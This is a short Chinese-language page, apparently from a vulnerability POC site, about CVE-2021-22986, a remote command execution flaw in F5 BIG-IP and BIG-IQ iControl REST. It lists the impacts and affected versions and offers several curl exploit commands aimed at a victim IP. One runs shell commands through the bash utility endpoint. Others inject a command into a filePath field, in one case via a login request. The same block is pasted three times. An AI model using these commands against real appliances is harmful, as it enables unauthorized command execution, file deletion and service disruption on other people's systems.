CVE-2021-22986_F5_BIG-IP_iControl_RCE漏洞

# CVE-2021-22986 F5 BIG-IP iControl RCE漏洞

==漏洞危害==
*執行任意系統命令
*創建或刪除文件
*禁用服務
==影響版本==
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	16.x 	16.0.0 – 16.0.1 	16.0.1.1
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	15.x 	15.1.0 – 15.1.2 	15.1.2.1
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	14.x 	14.1.0 – 14.1.3 	14.1.4
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	13.x 	13.1.0 – 13.1.3 	13.1.3.6
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	12.x 	12.1.0 – 12.1.5 	12.1.5.3*
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	11.x 	None 	Not applicable
BIG-IQ Centralized Management 	8.x 	None 	8.0.0
BIG-IQ Centralized Management 	7.x 	7.1.0, 7.0.0 	7.1.0.3, 7.0.0.2
BIG-IQ Centralized Management 	6.x 	6.0.0 – 6.1.0 	None

==POC==

curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'

==漏洞危害==

*執行任意系統命令
*創建或刪除文件
*禁用服務
==影響版本==
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	16.x 	16.0.0 – 16.0.1 	16.0.1.1
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	15.x 	15.1.0 – 15.1.2 	15.1.2.1
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	14.x 	14.1.0 – 14.1.3 	14.1.4
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	13.x 	13.1.0 – 13.1.3 	13.1.3.6
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	12.x 	12.1.0 – 12.1.5 	12.1.5.3*
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	11.x 	None 	Not applicable
BIG-IQ Centralized Management 	8.x 	None 	8.0.0
BIG-IQ Centralized Management 	7.x 	7.1.0, 7.0.0 	7.1.0.3, 7.0.0.2
BIG-IQ Centralized Management 	6.x 	6.0.0 – 6.1.0 	None

==POC==

curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'

==漏洞危害==

*執行任意系統命令
*創建或刪除文件
*禁用服務
==影響版本==
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	16.x 	16.0.0 – 16.0.1 	16.0.1.1
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	15.x 	15.1.0 – 15.1.2 	15.1.2.1
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	14.x 	14.1.0 – 14.1.3 	14.1.4
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	13.x 	13.1.0 – 13.1.3 	13.1.3.6
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	12.x 	12.1.0 – 12.1.5 	12.1.5.3*
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 	11.x 	None 	Not applicable
BIG-IQ Centralized Management 	8.x 	None 	8.0.0
BIG-IQ Centralized Management 	7.x 	7.1.0, 7.0.0 	7.1.0.3, 7.0.0.2
BIG-IQ Centralized Management 	6.x 	6.0.0 – 6.1.0 	None

==POC==
1.

curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'

2.

curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}'

3.

curl -ksu admin:[redacted] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容